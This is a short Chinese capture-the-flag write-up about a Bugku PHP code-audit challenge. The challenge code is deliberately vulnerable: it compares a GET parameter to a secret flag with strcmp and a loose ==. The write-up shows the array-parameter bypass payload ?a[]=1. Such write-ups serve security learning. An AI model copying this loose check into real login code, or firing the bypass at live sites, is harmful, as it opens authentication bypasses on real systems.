Bugku—PHP代码审计——strcmp比较字符串

<?php $flag = "flag{xxxxx}"; if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0； 如果 str1大于 str2返回 > 0；如果两者相等，返回 0。 //比较两个字符串（区分大小写） die('Flag: '.$flag); else print 'No'; } ?>

strcmp有一个bug就是如果比较的是数组的话，还是会返回一个0。

所以直接构造数组绕过： payload：?a[]=1